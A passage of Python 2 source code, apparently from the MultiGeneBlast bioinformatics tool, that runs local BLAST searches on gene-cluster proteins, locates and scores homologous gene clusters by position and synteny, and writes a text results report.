#Determine alignment distribution / lengths for display in SVG to put in names as pseudo-locations
names = []
genedict = {}
accessiondict = {}
totalnt = 0
for tag in querytags:
startsite = str(totalnt)
fname = "input|c1|" + startsite
totalnt += (seqlengths[tag] * 3)
endsite = str(totalnt)
fname = fname + "-" + endsite + "|+|" + tag + "|" + tag + "|" + tag + "|" + tag
seqlengths[fname] = seqlengths[tag]
totalnt += 100
names.append(fname)
accessiondict[tag] = tag
genedict[tag] = [startsite, endsite, "+", tag, seqdict[tag], tag, tag]
genelist = names
proteins = [names, seqs, genelist, genedict, accessiondict]
return proteins, querytags, seqdict, names, seqs
def parse_absolute_paths(infile):
#Parse absolute paths if found
originalfilename = infile
if "/" in infile or "\\" in infile:
lastpos = max([infile.rfind("\\"),infile.rfind("/")])
originpath = infile[:(lastpos + 1)]
infile = infile[(lastpos + 1):]
#if os.getcwd() != originalfilename[:lastpos] and os.getcwd() != originalfilename[:lastpos].replace("/","\\"):
# shutil.copyfile(originalfilename, infile)
return infile
def read_input_file(infile, startpos, endpos, ingenes, gui, outbox=None, frame=None):
global GUI
GUI = gui
global OUTBOX
OUTBOX = outbox
global FRAME
FRAME = frame
log("Reading and parsing input GenBank file...")
#infile = parse_absolute_paths(infile)
ext = infile.rpartition(".")[2]
if ext.lower() in ["gbk","gb","genbank"]:
proteins = gbk2proteins(infile)
elif ext.lower() in ["embl","emb"]:
proteins = embl2proteins(infile)
elif ext.lower() in ["fasta","fas","fa","fna"]:
nucname = "Architecture Search FASTA input"
genomic_accnr = ""
dnaseqlength = 0
proteins, querytags, seqdict, names, seqs = generate_architecture_data(infile)
writefasta(names,seqs,"query.fasta")
arch_search = "y"
return proteins, genomic_accnr, dnaseqlength, nucname, querytags, names, seqs, seqdict, arch_search
arch_search = "n"
genomic_accnr = proteins[1]
dnaseqlength = proteins[2]
nucname = proteins[3]
proteins = proteins[0]
querytags = []
z = 0
names = []
seqs = []
seqdict = {}
if startpos != "N/A" and endpos != "N/A":
for i in proteins[0]:
seq = proteins[1][z]
pstartpos = int(i.split("|")[2].split("-")[0])
pendpos = int(i.split("|")[2].split("-")[1])
if (pstartpos > startpos and pstartpos < endpos) or (pendpos > startpos and pendpos < endpos):
names.append(i)
seqs.append(seq)
seqdict[i] = seq
querytags.append(i.split("|")[4])
z += 1
if len(names) == 0:
log("Error: no genes found within the specified region of the input file.", exit=True)
elif ingenes != "N/A":
for i in proteins[0]:
seq = proteins[1][z]
if i.split("|")[4] in ingenes or i.split("|")[6] in ingenes or i.split("|")[6].partition(".")[0] in ingenes or i.split("|")[6].partition(".")[0] in [gene.partition(".")[0] for gene in ingenes] or i.split("|")[7] in ingenes:
names.append(i)
seqs.append(seq)
seqdict[i] = seq
querytags.append(i.split("|")[4])
z += 1
if len(names) == 0:
log("Error: no genes found with these names in the input file.", exit=True)
writefasta(names,seqs,"query.fasta")
return proteins, genomic_accnr, dnaseqlength, nucname, querytags, names, seqs, seqdict, arch_search
def internal_blast(minseqcoverage, minpercidentity, names, proteins, seqdict, nrcpus):
#Run BLAST on gene cluster proteins of each cluster on itself to find internal homologs, store groups of homologs - including singles - in a dictionary as a list of lists accordingly
log("Finding internal homologs..")
internalhomologygroupsdict = {}
clusternumber = 1
#Make Blast db for internal search
makeblastdbcommand = "makeblastdb -in query.fasta -out query.fasta -dbtype prot"
makeblastdb_stdout = os.popen4(makeblastdbcommand)
makeblastdb_stdout = makeblastdb_stdout[1].read()
z = 0
while "error" in makeblastdb_stdout.lower():
log(makeblastdb_stdout)
log("Error running BLAST. Retrying...")
makeblastdb_stdout = os.popen4(makeblastdbcommand)
makeblastdb_stdout = makeblastdb_stdout[1].read()
if z > 2:
log("Error generating internal Blast database, exiting. Please check your system.", exit=True)
z += 1
#Run and parse BLAST search
blastsearch = "blastp -db query.fasta -query query.fasta -outfmt 6 -max_target_seqs 1000 -evalue 1e-05 -out internal_input.out -num_threads " + str(nrcpus)
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
z = 0
while "error" in blast_stdout.lower():
log(blast_stdout)
log("Error running BLAST. Retrying...")
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
if z > 2:
log("Error running Blast, exiting. Please check your system.", exit=True)
z += 1
blastoutput = open("internal_input.out","r").read()
seqlengths = fastaseqlengths(proteins)
iblastinfo = blastparse(blastoutput, minseqcoverage, minpercidentity, seqlengths, seqdict, "internal", "prot")
iblastdict = iblastinfo[0]
#find and store internal homologs
groups = []
for j in names:
frame_update()
if iblastdict.has_key(j):
hits = iblastdict[j][0]
group = []
for k in hits:
if k[:2] == "h_":
group.append(k[2:])
elif k.count("|") > 4:
group.append(k.split("|")[4])
else:
group.append(k)
if j.split("|")[4] not in group:
group.append(j.split("|")[4])
x = 0
for l in groups:
for m in group:
if m in l:
del groups[x]
for n in l:
if n not in group:
group.append(n)
break
x += 1
group.sort()
groups.append(group)
else:
groups.append([j.split("|")[4]])
internalhomologygroupsdict[clusternumber] = groups
return internalhomologygroupsdict, seqlengths
def runblast(args, dbtype):
#return ##CAN BE UNCOMMENTED TEMPORARILY FOR FAST TESTING
if dbtype == "prot":
blastsearch = "blastp " + args
else:
blastsearch = "tblastn " + args
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
z = 0
while "error" in blast_stdout.lower():
print blast_stdout
print "Error running BLAST. Retrying..."
blast_stdout = os.popen4(blastsearch)
blast_stdout = blast_stdout[1].read()
if z > 2:
print "Error running Blast, exiting. Please check your system."
sys.exit(1)
z += 1
def db_blast(names, seqs, db, nrcpus, hitspergene, dbtype="prot"):
##Run BLAST on genbank_mf database
log("Running NCBI BLAST+ searches on GenBank database..")
queryclusternames = names
queryclusterseqs = seqs
writefasta(queryclusternames,queryclusterseqs,"input.fasta")
#blastsearch = "blastp -db " + db + " -query input.fasta -outfmt 6 -max_target_seqs 1000 -num_descriptions 1000 -num_alignments 500 -evalue 1e-05 -out input.out -num_threads " + str(nrcpus)
#blast_stdout = os.popen4(blastsearch) ##CAN BE COMMENTED OUT TEMPORARILY FOR FAST TESTING
#blast_stdout = blast_stdout[1].read()
#z = 0
#while "error" in blast_stdout.lower():
# log(blast_stdout)
# log("Error running BLAST. Retrying...")
# blast_stdout = os.popen4(blastsearch) ##CAN BE COMMENTED OUT TEMPORARILY FOR FAST TESTING
# blast_stdout = blast_stdout[1].read()
# if z > 2:
# log("Error running Blast, exiting. Please check your system.", exit=True)
# z += 1
args = "-db " + db + " -query input.fasta -outfmt 6 -max_target_seqs " + str(hitspergene) + " -evalue 1e-05 -out input.out -num_threads " + str(nrcpus)
mgbprocess = Process(target=runblast, args=[args, dbtype])
mgbprocess.start()
while True:
processrunning = "n"
if mgbprocess.is_alive():
processrunning = "y"
if processrunning == "y" and GUI == "y":
FRAME.update()
elif processrunning == "y":
pass
else:
break
try:
blastoutputfile = open("input.out","r")
except:
log("Error while execution NCBI Blast: no output file generated", exit=True)
blastoutput = blastoutputfile.read()
blastoutputfile.close()
return blastoutput
def parse_blast(blastoutput, minseqcoverage, minpercidentity, seqlengths, seqdict, dbname, dbtype):
#Read BLAST output and parse
log("Blast search finished. Parsing results...")
blastinfo = blastparse(blastoutput, minseqcoverage, minpercidentity, seqlengths, seqdict, dbname, dbtype)
blastdict = blastinfo[0]
if len(blastdict.keys()) == 0:
log("No BLAST hits found above significance tresholds. Exiting MultiGeneBlast...", exit=True)
querylist = blastinfo[1]
return blastdict, querylist
def frame_update():
if GUI == "y":
global FRAME
FRAME.update()
def load_genecluster_info(dbname, allgenomes):
#Load gene cluster info to memory
DBPATH = os.environ['BLASTDB']
clusters = {}
allgenomes_tags = [genomename[:6] for genomename in allgenomes]
for i in fileinput.input(DBPATH + os.sep + dbname + "_all_descrs.txt"):
tabs = i.split("\t")
if len(tabs) > 0 and (tabs[0] in allgenomes or tabs[0] in allgenomes_tags):
accession = tabs[0]
clusterdescription = tabs[1]
clusters[accession] = clusterdescription
nucdescriptions = clusters
frame_update()
return nucdescriptions, clusters
class ProteinInfo(object):
__slots__ = ['genome', 'pstart', 'pend', 'strand', 'annotation', 'locustag']
def __init__(self, genome, pstart, pend, strand, annotation, locustag):
self.genome = genome
if pstart.isdigit():
self.pstart = int(pstart)
if pend.isdigit():
self.pend = int(pend)
if strand == "+":
self.strand = 1
else:
self.strand = -1
self.annotation = annotation
self.locustag = locustag
def load_dbproteins_info(querylist, blastdict, dbname):
##Load needed gene cluster database proteins info into memory
global DBPATH
DBPATH = os.environ['BLASTDB']
allhitprots = []
nucdict = {}
temp_proteininfo = {}
proteininfo = {}
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
for j in subjects:
if j not in allhitprots:
allhitprots.append(j)
allhitprots.sort()
allgenomes = []
proteininfo_archive = tarfile.open(DBPATH + os.sep + dbname + ".pinfo.tar")
same = "n"
next_idx = 0
for j in allhitprots:
next_idx += 1
frame_update()
if same == "n":
try:
infofile = proteininfo_archive.extractfile("proteininfo/" + j[:4].upper() + ".pickle")
proteininfodict = pickle.load(infofile)
except:
log(j[:4].upper() + ".pickle" + " missing in proteininfo tar")
continue ##########THIS NEEDS TO BE FIXED IN THE DB TO PREVENT THIS ERROR / MAKE THIS UNNECESSARY
if not proteininfodict.has_key(j):
log(j + " missing in proteininfodict")
continue ##########THIS NEEDS TO BE FIXED IN THE DB TO PREVENT THIS ERROR / MAKE THIS UNNECESSARY
pinfo = str(proteininfodict[j])
#Fix for 'stuttering' of nucl accession number
if pinfo.count(pinfo.split("|")[0] + "|") > 1 and pinfo.split("|")[0] != "":
log("Correcting" + j + ":\n" + str(pinfo) + "\n" + pinfo.split("|")[0] + "|" + pinfo.rpartition(pinfo.split("|")[0])[2])
pinfo = pinfo.split("|")[0] + "|" + pinfo.rpartition(pinfo.split("|")[0])[2]
#Fix for faulty coordinates
if not pinfo.split("|")[1].replace("-","").isdigit():
if pinfo.split("|")[1].replace("-","").replace(")","").isdigit():
pinfo = pinfo.split("|")[0] + "|" + pinfo.split("|")[1].replace(")","") + "|" + "|".join(pinfo.split("|")[2:])
if "," in pinfo.split("|")[1].replace("-",""):
pinfo = pinfo.split("|")[0] + "|" + pinfo.split("|")[1].partition(",")[0] + "-" + pinfo.split("|")[1].rpartition("-")[2] + "|" + "|".join(pinfo.split("|")[2:])
if "|" not in str(pinfo) or pinfo.split("|")[0] == "":
log("DNA accession number missing for " + j + "\n" + str(pinfo))
continue ##########THIS NEEDS TO BE FIXED IN THE DB TO PREVENT THIS ERROR / MAKE THIS UNNECESSARY
tabs = pinfo.split("|")
if len(tabs) < 4:
log("Faulty info for " + j + ":\n" + str(pinfo))
continue
if "-" not in tabs[1] and "-" in tabs[2]:
del tabs[1]
protein = tabs[3]
genome = tabs[0]
location = tabs[1]
strand = tabs[2]
annotation = tabs[4]
locustag = tabs[5]
pstart = location.partition("-")[0]
pend = location.partition("-")[2]
if not pend.isdigit():
pend = str(int(pstart) + 100)
if genome not in allgenomes:
allgenomes.append(genome)
temp_proteininfo[genome] = [j, ProteinInfo(genome,pstart,pend,strand,annotation,locustag)]
else:
if temp_proteininfo.has_key(genome):
old_entry = temp_proteininfo[genome]
proteininfo[old_entry[0]] = old_entry[1]
nucdict[old_entry[0]] = old_entry[1].genome
del temp_proteininfo[genome]
proteininfo[j] = ProteinInfo(genome,pstart,pend,strand,annotation,locustag)
nucdict[j] = genome
if not (len(allhitprots) > next_idx and j[:4] == allhitprots[next_idx][:4]):
infofile.close()
same = "n"
else:
same = "y"
lasthitprot = j
proteininfo_archive.close()
allgenomes.sort()
return allgenomes, nucdict, proteininfo
def load_ndb_info(querylist, blastdict, dbname):
##Load needed gene cluster database proteins info into memory
global DBPATH
DBPATH = os.environ['BLASTDB']
allhitprots = []
nucdict = {}
proteininfo = {}
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
for j in subjects:
if j not in allhitprots:
allhitprots.append(j)
genome = j.rpartition("_")[0]
pstart = min([blastdict[i][1][j][4],blastdict[i][1][j][5]])
pend = max([blastdict[i][1][j][4],blastdict[i][1][j][5]])
if int(blastdict[i][1][j][5]) > int(blastdict[i][1][j][4]):
strand = "+"
else:
strand = "-"
annotation = "tblastn hit"
locustag = "tblastn_hit_" + j.rpartition("_")[2]
proteininfo[j] = ProteinInfo(genome,pstart,pend,strand,annotation,locustag)
allhitprots.sort()
allgenomes = []
frame_update()
for j in allhitprots:
genome = j.rpartition("_")[0]
if genome not in allgenomes:
allgenomes.append(genome)
nucdict[j] = genome
allgenomes.sort()
return allgenomes, nucdict, proteininfo
def load_other_genes(allgenomes, proteininfo, dbname, blastdict):
#Add all other genes from same genomes to proteininfo
global DBPATH
DBPATH = os.environ['BLASTDB']
genecords_archive = tarfile.open(DBPATH + os.sep + dbname + ".cords.tar")
same = "n"
for i in allgenomes:
frame_update()
if same == "n":
infofile = genecords_archive.extractfile("genecords/" + i[:5].upper() + ".pickle")
genecordsdict = pickle.load(infofile)
genecords = genecordsdict[i]
genomeprotpositions = [proteininfo[prot].pstart for prot in proteininfo.keys() if i == proteininfo[prot].genome]
genomeprotpositions.extend([proteininfo[prot].pend for prot in proteininfo.keys() if i == proteininfo[prot].genome])
blastsubjects = [item for sublist in [blastdict[key][0] for key in blastdict.keys()] for item in sublist]
for j in genecords:
if j.count(j.split("|")[0]) > 1:
j = j.rpartition(j.split("|")[1]) + j.rpartition(j.split("|")[2])
if "|" in j:
tabs = j.split("|")
if "-" not in tabs[1] and "-" in tabs[2]:
del tabs[1]
protein = tabs[3]
genome = tabs[0]
location = tabs[1]
strand = tabs[2]
annotation = tabs[4]
locustag = tabs[5]
pstart = location.partition("-")[0]
pend = location.partition("-")[2]
if not pstart.isdigit():
pstart = 0
pend = 0
elif not pend.isdigit():
pend = str(int(pstart) + 100)
gene_is_close_to_hit = False
for position in genomeprotpositions:
if abs(int(pstart) - position) < 20000:
gene_is_close_to_hit = True
if not gene_is_close_to_hit and protein not in blastsubjects:
if not (len(allgenomes) > (allgenomes.index(i) + 1) and i[:5] == allgenomes[allgenomes.index(i) + 1][:5]):
infofile.close()
same = "n"
else:
same = "y"
continue
if not proteininfo.has_key(protein):
proteininfo[protein] = ProteinInfo(genome,pstart,pend,strand,annotation,locustag)
correct = "n"
z = 0
while correct == "n" and z < 2:
try:
number = 1 + int(proteininfo[protein].pstart)
number = 1 + int(proteininfo[protein].pend)
correct = "y"
except:
j = j.rpartition(genome)[1] + j.rpartition(genome)[2]
tabs = j.split("|")
protein = tabs[3]
genome = tabs[0]
location = tabs[1]
strand = tabs[2]
annotation = tabs[4]
locustag = tabs[5]
proteininfo[protein] = ProteinInfo(genome,location.partition("-")[0],location.partition("-")[2],strand,annotation,locustag)
z += 1
if not (len(allgenomes) > (allgenomes.index(i) + 1) and i[:5] == allgenomes[allgenomes.index(i) + 1][:5]):
infofile.close()
same = "n"
else:
same = "y"
genecords_archive.close()
return proteininfo
def load_databases(querylist, blastdict, processnr, dbname, dbtype):
#Load GenBank positional info into memory
log("Loading GenBank positional info into memory...")
if dbtype == "prot":
allgenomes, nucdict, proteininfo = load_dbproteins_info(querylist, blastdict, dbname)
proteininfo = load_other_genes(allgenomes, proteininfo, dbname, blastdict)
else:
allgenomes, nucdict, proteininfo = load_ndb_info(querylist, blastdict, dbname)
nucdescriptions, clusters = load_genecluster_info(dbname, allgenomes)
return nucdescriptions, nucdict, proteininfo
def find_hits_positions(blastdict, proteininfo, querylist):
#Find db xrefs, start positions, end positions, strand info for each hit and add to blast dict
log("Finding gene info of all hit genes...")
frame_update()
blastdict2 = {}
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
subjects2 = []
querydict = blastdict[i][1]
querydict2 = {}
for j in subjects:
#genome_acc = nucdict[j]
#geneinfo = [start,end,strand,annotation,sequence,accnr,genername]
#blastparse = [perc_ident,blastscore,perc_coverage,evalue]
#goal = [subject_genecluster,subject_start,subject_end,subject_strand,subject_annotation,perc_ident,blastscore,perc_coverage,evalue,locustag]
#goal now = [subject_start,subject_end,subject_strand,subject_annotation,perc_ident,blastscore,perc_coverage,evalue,locustag]
if proteininfo.has_key(j):
oldblastdictinfo = querydict[j]
if proteininfo[j].strand == 1:
strand = "+"
else:
strand = "-"
newblastdictinfo = [proteininfo[j].genome, proteininfo[j].pstart, proteininfo[j].pend, strand, proteininfo[j].annotation] + oldblastdictinfo + [j]
querydict2[j] = newblastdictinfo
subjects2.append(j)
else:
print "WARNING:", j, "accession number not taken into account; data entry invalid."
blastdict2[i] = [subjects2,querydict2]
blastdict = blastdict2
return blastdict
def sort_genes_per_nucleotide(querylist, blastdict, nucdict):
log("Locating gene clusters on nucleotide scaffolds...")
frame_update()
universalquerydict = {}
for i in querylist:
if blastdict.has_key(i):
querydict = blastdict[i][1]
universalquerydict.update(querydict)
#Make dictionary that sorts all hit genes per nucleotide scaffold
sourcedict = {}
source2dict = {}
multiplelist = []
multiplehitlist = []
nucdictkeys = nucdict.keys()
nucdictkeys.sort()
for j in nucdict.keys():
nucsource = nucdict[j]
if source2dict.has_key(nucsource):
if nucsource not in multiplelist:
multiplehitlist.append(source2dict[nucsource][0])
multiplelist.append(nucsource)
if j not in multiplehitlist:
multiplehitlist.append(j)
sourcedict[nucsource] = source2dict[nucsource] + [j]
else:
sourcedict[nucsource].append(j)
if j not in multiplehitlist:
multiplehitlist.append(j)
else:
source2dict[nucsource] = [j]
return sourcedict, multiplehitlist, universalquerydict
def find_geneclusters(sourcedict, universalquerydict, allowedgenedistance, nucdescriptions, proteininfo, dnaseqlength):
#For every genomic scaffold, find gene clusters based on positions and save gene-cluster links in dictionary
clusters = {}
clusterdict = {}
geneposdict = {}
hitclusters = []
extraspace = 20000
if int(dnaseqlength) / 2 > 20000:
extraspace = int(int(dnaseqlength) / 2)
if extraspace > int(allowedgenedistance):
extraspace = int(allowedgenedistance)
nuccodes = dict.fromkeys(sourcedict.keys()).keys()
for i in nuccodes:
frame_update()
extragenes = []
for j in proteininfo.keys():
if i == proteininfo[j].genome:
extragenes.append(j)
scaffoldgenes = sourcedict[i]
nuc_acc = i
protstartlocations = []
protendlocations = []
for j in scaffoldgenes:
startpos = int(universalquerydict[j][1])
endpos = int(universalquerydict[j][2])
if startpos > endpos:
startpos, endpos = endpos, startpos
protstartlocations.append(startpos)
protendlocations.append(endpos)
geneposdict[j] = [startpos,endpos]
protstartlocations.sort()
protendlocations.sort()
nrlocations = len(protstartlocations)
a = 0
clusterstarts = []
clusterends = []
for j in protstartlocations:
if a == 0:
cstart = str(int(j) - extraspace)
if int(cstart) < 0:
cstart = "0"
clusterstarts.append(cstart)
if len(protendlocations) == 1:
clusterends.append(str(int(protendlocations[a]) + extraspace))
elif a == nrlocations - 1:
if j < ((protendlocations[a - 1]) + allowedgenedistance):
clusterends.append(str(int(protendlocations[a]) + extraspace))
else:
cend = str(int(protendlocations[a - 1]) + extraspace)
clusterends.append(cend)
cstart = str(int(j) - extraspace)
if int(cstart) < 0:
cstart = "0"
clusterstarts.append(cstart)
clusterends.append(str(protendlocations[a]))
else:
if j > ((protendlocations[a - 1]) + allowedgenedistance):
clusterends.append(str(int(protendlocations[a - 1]) + extraspace))
cstart = str(j - extraspace)
if int(cstart) < 0:
cstart = "0"
clusterstarts.append(cstart)
else:
pass
a += 1
geneclusternumber = 0
for j in clusterstarts:
geneclustername = nuc_acc + "_" + str(geneclusternumber)
if geneclustername not in hitclusters:
hitclusters.append(geneclustername)
cstart = int(j)
cend = int(clusterends[geneclusternumber])
clustergenes = []
clustergenesdict = {}
geneclusternumber += 1
for k in scaffoldgenes:
startpos = int(geneposdict[k][0])
endpos = int(geneposdict[k][1])
if (startpos >= cstart and startpos <= cend) or (endpos >= cstart and endpos <= cend):
clusterdict[k] = geneclustername
clustergenes.append(k)
clustergenesdict[k] = startpos
for j in extragenes:
if (int(proteininfo[j].pstart) >= cstart and int(proteininfo[j].pstart) <= cend) or (int(proteininfo[j].pend) >= cstart and int(proteininfo[j].pend) <= cend):
if j not in clustergenes:
clustergenes.append(j)
clustergenesdict[j] = int(proteininfo[j].pstart)
nucdescription = ""
for i in nucdescriptions.keys():
if i in nuc_acc.split(".")[0]:
nucdescription = nucdescriptions[i]
break
clustergenes = sortdictkeysbyvalues(clustergenesdict)
clusters[geneclustername] = [clustergenes,nucdescription]
return clusterdict, geneposdict, hitclusters, clusters
def update_blastdict(blastdict, querylist, clusterdict, multiplehitlist):
#Update blastdict
blastdict2 = {}
frame_update()
for i in querylist:
if blastdict.has_key(i):
subjects = blastdict[i][0]
querydict = blastdict[i][1]
querydict2 = {}
multiplehitlistsubjects = "n"
for j in subjects:
if j in multiplehitlist:
multiplehitlistsubjects = "y"
geneclustername = clusterdict[j]
oldblastdictinfo = querydict[j][1:]
newblastdictinfo = [geneclustername] + oldblastdictinfo
querydict2[j] = newblastdictinfo
if multiplehitlistsubjects == "y":
blastdict2[i] = [subjects,querydict2]
else:
blastdict2[i] = [[],{}]
blastdict = blastdict2
return blastdict
def find_genomic_loci(blastdict, nucdict, proteininfo, allowedgenedistance, querylist, nucdescriptions, dnaseqlength):
##In Genbank files, locate clusters of hits within 20 kb distance using new info from blastdict
##Save clusters and sort first based on nr query genes having homologs in them, second based on cumulative BLAST bit score; update blastdict with cluster ID
#Write dictionary with genes and positions for all nucleotide scaffolds
blastdict = find_hits_positions(blastdict, proteininfo, querylist)
sourcedict, multiplehitlist, universalquerydict = sort_genes_per_nucleotide(querylist, blastdict, nucdict)
clusterdict, geneposdict, hitclusters, clusters = find_geneclusters(sourcedict, universalquerydict, allowedgenedistance, nucdescriptions, proteininfo, dnaseqlength)
blastdict = update_blastdict(blastdict, querylist, clusterdict, multiplehitlist)
return blastdict, geneposdict, hitclusters, clusters, multiplehitlist
def score_blast(hitclusters, querylist, blastdict, clusters, multiplehitlist, arch_search, syntenyweight):
#Score BLAST output on all gene clusters
#Rank gene cluster hits based on 1) number of protein hits covering >25% sequence length or at least 100aa alignment, with >30% identity and 2) cumulative blast score
#Find number of protein hits and cumulative blast score for each gene cluster
log(" Scoring Blast outputs...")
hitclusterdict = {}
hitclusterdata = {}
for i in hitclusters:
frame_update()
hitclusterdatalist = []
nrhits = float(0)
cumblastscore = float(0)
hitpositions = []
hitposcorelist = []
for j in querylist:
querynrhits = 0
querycumblastscore = float(0)
nrhitsplus = "n"
if blastdict.has_key(j):
for k in blastdict[j][0]:
if k in multiplehitlist and i == blastdict[j][1][k][0]:
if [querylist.index(j),clusters[i][0].index(blastdict[j][1][k][11])] not in hitpositions:
nrhitsplus = "y"
querynrhits += 1
blastscore = float(blastdict[j][1][k][6]) / 1000000
querycumblastscore = querycumblastscore + blastscore
hitclusterdatalist.append([j,k,blastdict[j][1][k][5],blastdict[j][1][k][6],blastdict[j][1][k][7],blastdict[j][1][k][8]])
hitclusterdata[i] = hitclusterdatalist
hitpositions.append([querylist.index(j),clusters[i][0].index(blastdict[j][1][k][11])])
if nrhitsplus == "y":
nrhits += 1
for hit in range(querynrhits):
hitposcorelist.append(0)
cumblastscore = cumblastscore + float(querycumblastscore)
query_givenscores_querydict = {}
query_givenscores_hitdict = {}
#Find groups of hits
hitgroupsdict = {}
for p in hitpositions:
if not hitgroupsdict.has_key(p[0]):
hitgroupsdict[p[0]] = [p[1]]
else:
hitgroupsdict[p[0]].append(p[1])
#Calculate synteny score; give score only if more than one hits (otherwise no synteny possible), and only once for every query gene and every hit gene
if arch_search == "n":
synteny_score = 0
z = 1
if nrhits > 1:
for p in hitpositions[:-1]:
tandem = "n"
#Check if a gene homologous to this gene has already been scored for synteny in the previous entry
if p[1] in hitgroupsdict[hitpositions[z][0]]:
tandem = "y"
#Score entry
if ((not query_givenscores_querydict.has_key(p[0])) or query_givenscores_querydict[p[0]] == 0) and ((not query_givenscores_hitdict.has_key(p[1])) or query_givenscores_hitdict[p[1]] == 0) and tandem == "n":
q = hitpositions[z]
if (abs(p[0] - q[0]) < 2) and abs(p[0]-q[0]) == abs(p[1]-q[1]):
synteny_score += 1
if hitposcorelist[z - 1] == 1 or hitposcorelist[z] == 1:
synteny_score += 1
query_givenscores_querydict[p[0]] = 1
query_givenscores_hitdict[p[1]] = 1
else:
query_givenscores_querydict[p[0]] = 0
query_givenscores_hitdict[p[1]] = 0
z += 1
#Weigh synteny score by factor
synteny_score = float(synteny_score) * syntenyweight
#sorting score is based on number of hits (discrete values) & cumulative blast score (behind comma values)
sortingscore = nrhits + synteny_score + cumblastscore
else:
sortingscore = nrhits + cumblastscore
hitclusterdict[i] = float(sortingscore)
#Sort gene clusters
rankedclusters = sortdictkeysbyvaluesrev(hitclusterdict)
rankedclustervalues = sortdictkeysbyvaluesrevv(hitclusterdict)
return rankedclusters, rankedclustervalues, hitclusterdata
def write_txt_output(rankedclusters, rankedclustervalues, hitclusterdata, proteins, proteininfo, querytags, infile, clusters, nucdescriptions, pages):
global dbname
#Check if the number of set pages is not too large for the number of results
possible_pages = len(rankedclusters) / 50
if len(rankedclusters) % 50 > 1:
possible_pages += 1
if possible_pages < int(pages):
pages = possible_pages
if pages == 0:
pages = 1
#Output for each hit: table of genes and locations of input cluster, table of genes and locations of hit cluster, table of hits between the clusters
log(" Writing TXT output file...")
out_file = open(dbname + "clusterblast_output.txt","w")
out_file.write("ClusterBlast scores for " + infile)
out_file.write("\n")
out_file.write("\n")
out_file.write("Table of genes, locations, strands and annotations of query cluster:")
out_file.write("\n")
maxpos = 0
minpos = 1000000000000
for i in querytags:
out_file.write(i)
out_file.write("\t")
out_file.write(proteins[3][i][0])
out_file.write("\t")
out_file.write(proteins[3][i][1])
out_file.write("\t")
out_file.write(proteins[3][i][2])
out_file.write("\t")
out_file.write(proteins[3][i][3])
out_file.write("\t")
out_file.write(proteins[3][i][-1])
out_file.write("\t")
out_file.write("\n")
if int(proteins[3][i][0]) > maxpos:
maxpos = int(proteins[3][i][0])
if int(proteins[3][i][1]) > maxpos:
maxpos = int(proteins[3][i][1])
if int(proteins[3][i][0]) < minpos:
minpos = int(proteins[3][i][0])
if int(proteins[3][i][1]) < minpos:
minpos = int(proteins[3][i][1])
frame_update()
#Add extra genes from query file that are in between selected genes
for i in proteins[0]:
if int(i.split("|")[2].partition("-")[0]) > minpos and int(i.split("|")[2].partition("-")[2]) > minpos and int(i.split("|")[2].partition("-")[0]) < maxpos and int(i.split("|")[2].partition("-")[2]) < maxpos:
if i.split("|")[4] in querytags or i.split("|")[-1] in querytags:
continue
try:
out_file.write(i.split("|")[4])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][0])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][1])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][2])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][3])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][-1])
out_file.write("\t")
except:
out_file.write(i.split("|")[-1])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][0])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][1])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][2])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][3])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][-1])
out_file.write("\t")
out_file.write("\n")
out_file.write("\n")
out_file.write("\n")
out_file.write("Significant hits: ")
out_file.write("\n")
z = 0
for i in rankedclusters[:(pages * 50)]:
out_file.write(str(z+1) + ". " + i + "\t" + clusters[i][1])
out_file.write("\n")
z += 1
out_file.write("\n")
out_file.write("\n")
z = 0
out_file.write("Details:")
for i in rankedclusters[:(pages * 50)]:
frame_update()
value = str(rankedclustervalues[z])
nrhits = value.split(".")[0]
if nrhits > 0:
out_file.write("\n\n")
out_file.write(">>")
out_file.write("\n")
mgbscore = cumblastscore = str(float(value.split(".")[0] + "." + value.split(".")[1][0]))
cumblastscore = str(int(float("0." + value.split(".")[1][1:]) * 100000))
out_file.write("\n")
out_file.write(str(z+1) + ". " + i)
out_file.write("\n")
nucleotidename = ""
for j in i.split("_")[:-1]:
nucleotidename = nucleotidename + j + "_"
nucleotidename = nucleotidename[:-1].split(".")[0]
nucdescription = ""
for j in nucdescriptions.keys():
if j in nucleotidename:
nucdescription = nucdescriptions[j]
break
out_file.write("Source: " + nucdescription)
out_file.write("\n")
out_file.write("Number of proteins with BLAST hits to this cluster: " + nrhits)
out_file.write("\n")
out_file.write("MultiGeneBlast score: " + mgbscore)
out_file.write("\n")
out_file.write("Cumulative Blast bit score: " + cumblastscore)
out_file.write("\n")
out_file.write("\n")
out_file.write("Table of genes, locations, strands and annotations of subject cluster:")
out_file.write("\n")
clusterproteins = clusters[i][0]
for j in clusterproteins:
#if proteinlocations.has_key(j) and proteinannotations.has_key(j) and proteinstrands.has_key(j):
out_file.write(j)
out_file.write("\t")
out_file.write(str(proteininfo[j].pstart))
out_file.write("\t")
out_file.write(str(proteininfo[j].pend))
out_file.write("\t")
if proteininfo[j].strand == 1:
out_file.write("+")
else:
out_file.write("-")
out_file.write("\t")
out_file.write(str(proteininfo[j].annotation))
out_file.write("\t")
out_file.write(str(proteininfo[j].locustag.replace("\n","")))
out_file.write("\n")
out_file.write("\n")
out_file.write("Table of Blast hits (query gene, subject gene, %identity, blast score, %coverage, e-value):")
out_file.write("\n")
if i in hitclusterdata.keys():
tabledata = hitclusterdata[i]
for x in tabledata:
w = 0
for y in x:
if w == 0:
out_file.write(str(y).split("|")[4])
out_file.write("\t")
w += 1
else:
out_file.write(str(y))
out_file.write("\t")
out_file.write("\n")
else:
"data not found"
out_file.write("\n")
out_file.write("\n")
z += 1
out_file.close()
return pages
